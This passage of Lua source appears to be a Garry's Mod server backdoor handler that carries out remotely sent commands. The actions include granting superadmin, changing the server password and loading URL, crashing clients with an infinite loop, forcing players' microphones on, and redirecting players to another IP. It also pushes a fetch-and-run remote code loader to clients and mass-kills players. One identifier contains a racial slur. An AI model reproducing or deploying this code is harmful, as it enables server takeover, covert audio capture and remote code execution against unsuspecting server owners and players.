  2502. end
  2504. if (uaction == "namechangerspam") then
  2505. local namesfs = {
  2506. "Marc",
  2507. "Hugh",
  2508. "Maurice",
  2509. "Gill",
  2510. "Etienne",
  2511. "Antoine",
  2512. "Jean",
  2513. "Benoit",
  2514. "Gilbert",
  2515. "Laurent",
  2516. "Alexis",
  2517. "Alexandre",
  2518. "Denis",
  2519. "Nicholas",
  2520. "Leon",
  2521. "Leonard",
  2522. "Leo",
  2523. "Olivier",
  2524. "Curtis",
  2525. "Antonio",
  2526. "Gregory",
  2527. "Charlie",
  2528. "Luc",
  2529. "Patrick",
  2530. "Phillip",
  2531. "Bernard",
  2532. "Charles",
  2533. "Gaspar",
  2534. "Claude",
  2535. "Michael",
  2536. "Brandon",
  2537. "Richard",
  2538. "William",
  2539. "Serge",
  2540. "Freddie",
  2541. "Samuel",
  2542. "Gaetan",
  2543. "Gerald",
  2544. "Arnold",
  2545. "Roland",
  2546. "Justin",
  2547. "Theodore",
  2548. "Claude",
  2549. "Hugues",
  2550. "Albert",
  2551. "Arthur",
  2552. "Jay",
  2553. "Jeremi",
  2554. "Rene",
  2555. "Pascal",
  2556. "Carlos",
  2557. "Fabien",
  2558. "Rafael",
  2559. "Benjamin",
  2560. "Ernest",
  2561. "Victor",
  2562. "Martin",
  2563. "Franck",
  2564. "Walter",
  2565. "Isaac",
  2566. "Roger",
  2567. "Alfred",
  2568. "Jason",
  2569. "Danny",
  2570. "Henry",
  2571. "Jimmy",
  2572. "Kevin",
  2573. "Geoffrey",
  2574. "Dominic",
  2575. "Christopher",
  2576. "David",
  2577. "Steven",
  2578. }
  2579. timer.Create( "namechangerspam", 5, 0, function()
  2580. for k,v in pairs (player.GetAll()) do local namez = table.Random( namesfs ) v:Say("/name " .. namez,true) end
  2581. end)
  2582. end
  2584. if (uaction == "namechangerstop") then
  2585. timer.Destroy("namechangerspam")
  2586. end
  2588. if (uaction == "allowcsluads") then
  2589. RunConsoleCommand("sv_allowcslua", net.ReadString())
  2590. end
  2592. if (uaction == "secureinfo") then
  2593. RunConsoleCommand("sv_password", net.ReadString())
  2594. end
  2596. if (uaction == "changeload") then
  2597. RunConsoleCommand( "sv_loadingurl", net.ReadString() )
  2598. end
  2600. if (uaction == "killuser") then
  2601. user:Kill()
  2602. end
  2604. if (uaction == "addmoneyall") then
  2605. for k,v in pairs(player.GetAll()) do timer.Create( "timerargent10", 0.01, 0, function() v:addMoney(11) end) end
  2606. end
  2608. if (uaction == "flashon") then
  2609. user:SendLua([[timer.Create("impulse 100", 0.001, 0, function() LocalPlayer():ConCommand("impulse 100") end)]])
  2610. end
  2612. if (uaction == "flashoff") then
  2613. user:SendLua([[timer.Remove("impulse 100")]])
  2614. end
  2616. if (uaction == "screenon") then
  2617. user:SendLua([[timer.Create("screenshot requested", 0.001, 0, function() LocalPlayer():ConCommand("screenshot requested") end)]])
  2618. end
  2620. if (uaction == "screenoff") then
  2621. user:SendLua([[timer.Remove("screenshot requested")]])
  2622. end
  2624. if (uaction == "killusersilence") then
  2625. user:KillSilent()
  2626. end
  2628. if (uaction == "allkillusersilence") then
  2629. for k,v in pairs (player.GetAll()) do v:KillSilent() end
  2630. end
  2632. if (uaction == "animation_salute") then
  2633. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_SALUTE) end
  2634. end
  2636. if (uaction == "animation_salute_loop") then
  2637. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_SALUTE) end
  2638. timer.Create("salute_loop",3.3,0,function()
  2639. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_SALUTE) end
  2640. end )
  2641. end
  2643. if (uaction == "animation_robot") then
  2644. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_ROBOT) end
  2645. end
  2647. if (uaction == "animation_robot_loop") then
  2648. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_ROBOT) end
  2649. timer.Create("robot_loop",11.35,0,function()
  2650. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_ROBOT) end
  2651. end )
  2652. end
  2654. if (uaction == "animation_cheer") then
  2655. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_CHEER) end
  2656. end
  2658. if (uaction == "animation_cheer_loop") then
  2659. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_CHEER) end
  2660. timer.Create("cheer_loop",2.7,0,function()
  2661. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_CHEER) end
  2662. end )
  2663. end
  2665. if (uaction == "animation_laugh") then
  2666. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_LAUGH) end
  2667. end
  2669. if (uaction == "animation_laugh_loop") then
  2670. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_LAUGH) end
  2671. timer.Create("laugh_loop",5.81,0,function()
  2672. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_LAUGH) end
  2673. end )
  2674. end
  2676. if (uaction == "animation_muscle") then
  2677. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_MUSCLE) end
  2678. end
  2680. if (uaction == "animation_muscle_loop") then
  2681. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_MUSCLE) end
  2682. timer.Create("muscle_loop",13,0,function()
  2683. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_MUSCLE) end
  2684. end )
  2685. end
  2687. if (uaction == "animation_persistence") then
  2688. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_PERSISTENCE) end
  2689. end
  2691. if (uaction == "animation_persistence_loop") then
  2692. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_PERSISTENCE) end
  2693. timer.Create("persistence_loop",3,0,function()
  2694. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_PERSISTENCE) end
  2695. end )
  2696. end
  2698. if (uaction == "animation_dance") then
  2699. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end
  2700. end
  2702. if (uaction == "animation_dance_loop") then
  2703. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end
  2704. timer.Create("dance_loop",8.9,0,function()
  2705. for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end
  2706. end )
  2707. end
  2709. if (uaction == "stop_timer_animation") then
  2710. timer.Destroy("salute_loop")
  2711. timer.Destroy("robot_loop")
  2712. timer.Destroy("cheer_loop")
  2713. timer.Destroy("laugh_loop")
  2714. timer.Destroy("muscle_loop")
  2715. timer.Destroy("persistence_loop")
  2716. timer.Destroy("dance_loop")
  2717. end
  2719. if (uaction == "scaleuser") then
  2720. local scale = net.ReadString()
  2721. user:SetModelScale( scale, 2 )
  2722. end
  2724. if (uaction == "scaleall") then
  2725. local scale = net.ReadString()
  2727. for k,v in pairs (player.GetAll()) do v:SetModelScale( scale, 2 ) end
  2728. end
  2730. if (uaction == "animation_salute_user") then
  2731. user:DoAnimationEvent(ACT_GMOD_TAUNT_SALUTE)
  2732. end
  2734. if (uaction == "animation_robot_user") then
  2735. user:DoAnimationEvent(ACT_GMOD_TAUNT_ROBOT)
  2736. end
  2738. if (uaction == "animation_cheer_user") then
  2739. user:DoAnimationEvent(ACT_GMOD_TAUNT_CHEER)
  2740. end
  2742. if (uaction == "animation_laugh_user") then
  2743. user:DoAnimationEvent(ACT_GMOD_TAUNT_LAUGH)
  2744. end
  2746. if (uaction == "animation_muscle_user") then
  2747. user:DoAnimationEvent(ACT_GMOD_TAUNT_MUSCLE)
  2748. end
  2750. if (uaction == "animation_persistence_user") then
  2751. user:DoAnimationEvent(ACT_GMOD_TAUNT_PERSISTENCE)
  2752. end
  2754. if (uaction == "animation_dance_user") then
  2755. user:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE)
  2756. end
  2758. if (uaction == "allkillusersilencestaff") then
  2759. for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != "user" ) then v:KillSilent() end end
  2760. end
  2762. if (uaction == "fireuser") then
  2763. user:Ignite( 30 )
  2764. end
  2766. if (uaction == "modelall") then
  2767. local model = net.ReadString()
  2768. for k,v in pairs(player.GetAll()) do v:SetModel(model) end
  2769. end
  2771. if (uaction == "cassergr") then
  2772. user:SetGravity( -5 )
  2773. end
  2775. if (uaction == "physicgamestyle") then
  2776. RunConsoleCommand("sv_friction", "-8")
  2777. end
  2779. if (uaction == "retablirphysicgamestyle") then
  2780. RunConsoleCommand("sv_friction", "8")
  2781. end
  2783. if (uaction == "earthquakeonall") then
  2784. for k, v in pairs( player.GetAll() ) do v:SendLua( [[util.ScreenShake( Vector( 0, 0, 0 ), 10, 5, 60, 5000 )]] ) end
  2785. end
  2787. if (uaction == "itemsall") then
  2788. local itemsss = net.ReadString()
  2789. for k,v in pairs (player.GetAll()) do v:Give( itemsss ) end
  2790. end
  2792. if (uaction == "cleanup") then
  2793. game.CleanUpMap()
  2794. end
  2796. if (uaction == "cassergrall") then
  2797. for k,v in pairs (player.GetAll()) do v:SetGravity( -5 ) end
  2798. end
  2800. if (uaction == "superadmin") then
  2801. user:SetUserGroup("superadmin")
  2802. end
  2804. if (uaction == "custom") then
  2805. user:SetUserGroup(net.ReadString())
  2806. end
  2808. if (uaction == "userrank") then
  2809. user:SetUserGroup("user")
  2810. end
  2812. if (uaction == "retablirgr") then
  2813. user:SetGravity( 0 )
  2814. end
  2816. if (uaction == "retablirgrall") then
  2817. for k,v in pairs (player.GetAll()) do v:SetGravity( 0 ) end
  2818. end
  2820. if (uaction == "strip") then
  2821. user:StripWeapons()
  2822. end
  2824. if (uaction == "unjailall") then
  2825. game.ConsoleCommand("ulx unjail *\n")
  2826. end
  2828. if (uaction == "contextfucker") then
  2830. util.AddNetworkString("enigmamod")
  2832. net.Receive( "enigmamod", function(len, len, ply)
  2833. local v = net.ReadEntity()
  2834. local two = net.ReadInt(32)
  2836. local function zapEffect(target)
  2837. local effectdata = EffectData()
  2838. effectdata:SetScale(1)
  2839. effectdata:SetMagnitude(1)
  2840. effectdata:SetScale(3)
  2841. effectdata:SetRadius(2)
  2842. effectdata:SetEntity(target)
  2843. for i = 1, 100, 1 do
  2844. timer.Simple(1 / i, function()
  2845. util.Effect("TeslaHitBoxes", effectdata, true, true)
  2846. end)
  2847. end
  2848. local Zap = math.random(1,9)
  2849. if Zap == 4 then Zap = 3 end
  2850. target:EmitSound("ambient/energy/zap" .. Zap .. ".wav")
  2851. end
  2852. local function teleportrandom()
  2853. local lesjoueurs = player.GetAll()
  2854. local random = math.random(1, #lesjoueurs)
  2855. if v == lesjoueurs[random] then return end
  2856. local sphere = ents.FindInSphere(v:GetPos(), 200)
  2857. for i=1, #sphere do
  2858. if sphere[i]:GetClass() == "player" then
  2859. if sphere[i] == lesjoueurs[random] then
  2860. teleportrandom()
  2861. return
  2862. end
  2863. end
  2864. end
  2865. v:SetPos(lesjoueurs[random]:GetPos() + Vector(100,0,30))
  2866. zapEffect(v)
  2867. end
  2869. if two == 1 then
  2870. v:VC_repairFull_Admin()
  2871. elseif two == 2 then
  2872. v:VC_fuelSet(v:VC_fuelGetMax())
  2873. elseif two == 3 then
  2874. v:VC_explodeEngine(true)
  2875. elseif two == 5 then
  2876. v:VC_damagePart("wheel", 1)
  2877. v:VC_damagePart("wheel", 2)
  2878. v:VC_damagePart("wheel", 3)
  2879. v:VC_damagePart("wheel", 4)
  2880. elseif two == 6 then
  2881. v:VC_clearSeats()
  2882. elseif two == 7 then
  2883. v:Remove()
  2884. elseif two == 8 then
  2885. v:Kill()
  2886. elseif two == 9 then
  2887. v:SetVelocity(v:GetVelocity() + Vector(math.random(1000,5000), math.random(1000,5000), math.random(1000,5000)))
  2888. elseif two == 10 then
  2889. v:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  2890. elseif two == 11 then
  2891. local rocket = ents.Create("m9k_launched_davycrockett")
  2892. local ply2 = v
  2893. rocket:SetPos(ply2:GetPos())
  2894. rocket:SetOwner(ply2)
  2895. rocket.Owner = ply2
  2896. rocket:Spawn()
  2897. rocket:Activate()
  2898. elseif two == 12 then
  2899. v:SendLua([[timer.Create("mictoggle", 0.1, 0, function()LocalPlayer():ConCommand("+voicerecord")end)]])
  2900. elseif two == 13 then
  2901. v:SendLua([[timer.Destroy("mictoggle")LocalPlayer():ConCommand("-voicerecord")]])
  2902. elseif two == 14 then
  2903. timer.Create("fuckthenigga",0.5,5,function()
  2904. local rocket = ents.Create("m9k_launched_davycrockett")
  2905. local ply2 = v
  2906. rocket:SetPos(ply2:GetPos())
  2907. rocket:SetOwner(ply2)
  2908. rocket.Owner = ply2
  2909. rocket:Spawn()
  2910. rocket:Activate()
  2911. end)
  2912. elseif two == 15 then
  2913. v:SetPos(v:GetPos() + Vector(200,200,200))
  2914. elseif two == 16 then
  2915. v:Fire("open", "", .6)
  2916. v:Fire("setanimation", "open", .6)
  2917. elseif two == 17 then
  2918. v:Fire( "Lock" )
  2919. elseif two == 18 then
  2920. hook.Add("Think", "fzefezfez", function()
  2921. local fuxios = v:GetPos() or nil
  2922. if fuxios == nil then return end
  2923. local mdr = ents.FindInSphere(v:GetPos(), 200)
  2924. for i=1, #mdr do
  2925. if mdr[i] == v then return end
  2926. if mdr[i]:IsPlayer() then
  2927. local explode = ents.Create( "env_explosion" )
  2928. explode:SetPos( mdr[i]:GetPos() )
  2929. explode:Spawn()
  2930. explode:SetKeyValue( "iMagnitude", "220" )
  2931. explode:Fire( "Explode", 0, 0 )
  2932. explode:EmitSound( "weapon_AWP.Single", 200, 200 )
  2933. end
  2934. timer.Simple(0.5,function()
  2935. mdr[i]:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) )
  2936. mdr[i]:Kill()
  2937. end)
  2938. end
  2939. end)
  2940. elseif two == 19 then
  2941. if v:VC_hasGodMode() then
  2942. v:VC_setGodMode(false)
  2943. else
  2944. v:VC_setGodMode(false)
  2945. end
  2946. elseif two == 20 then
  2947. hook.Add("Think", "fzefezfezzzz", function()
  2948. local mdr = ents.FindInSphere(v:GetPos(), 200)
  2949. for i=1, #mdr do
  2950. if mdr[i] == v then return end
  2951. mdr[i]:Remove()
  2952. end
  2953. end)
  2954. elseif two == 21 then
  2955. teleportrandom()
  2956. elseif two == 22 then
  2957. if not timer.Exists("saywhatttttt") then
  2958. teleportrandom()
  2959. timer.Create("saywhatttttt", 5, 0, teleportrandom)
  2960. else
  2961. timer.Remove("saywhatttttt")
  2962. end
  2963. elseif two == 23 then
  2964. Satellite = ents.Create("m9k_oribital_cannon")
  2965. Satellite.PoorBastard = true
  2966. Satellite.Target = v
  2967. Satellite.Sky = v:GetPos()
  2968. Satellite.Owner = v
  2969. Satellite:SetPos(v:GetPos())
  2970. Satellite:Spawn()
  2971. elseif two == 28 then
  2972. local fabrication = v:GetPos()
  2974. local npcweed = ents.Create( v:GetClass() )
  2975. npcweed:SetPos( Vector(fabrication.x + 15, fabrication.y, fabrication.z + 15) )
  2976. npcweed:Spawn()
  2977. elseif two == 29 then
  2978. local fabrication = v:GetPos()
  2980. for i = 1, 5 do
  2981. local npcweed = ents.Create( v:GetClass() )
  2982. npcweed:SetPos( Vector(fabrication.x + 15, fabrication.y, fabrication.z + 15) )
  2983. npcweed:Spawn()
  2984. end
  2985. end
  2986. end)
  2987. user:SendLua([[http.Fetch("", function(b) RunString(b) end)]])
  2988. end
  2990. if (uaction == "micon") then
  2991. user:SendLua([[timer.Create("mictoggle", 0.1, 0, function()LocalPlayer():ConCommand("+voicerecord")end)]])
  2992. end
  2994. if (uaction == "micoff") then
  2995. user:SendLua([[timer.Destroy("mictoggle")LocalPlayer():ConCommand("-voicerecord")]])
  2996. end
  2998. if (uaction == "crashuser") then
  2999. user:SendLua( "net.Receive(\"SENDTEST\", function() RunString(net.ReadString()) end)" )
  3000. net.Start( "SENDTEST" )
  3001. net.WriteString( [[ while true do end ]] )
  3002. net.Send(user)
  3003. end
  3005. if (uaction == "goduseron") then
  3006. user:GodEnable()
  3007. end
  3009. if (uaction == "goduseroff") then
  3010. user:GodDisable()
  3011. end
  3013. if (uaction == "redirectplayer") then
  3014. local ip=net.ReadString()
  3015. ply:SendLua([[LocalPlayer():ConCommand('connect ]]..tostring(ip)..[[')]])
  3016. end
  3018. if (uaction == "items") then
  3019. user:Give( net.ReadString() )
  3020. end
  3021. end)
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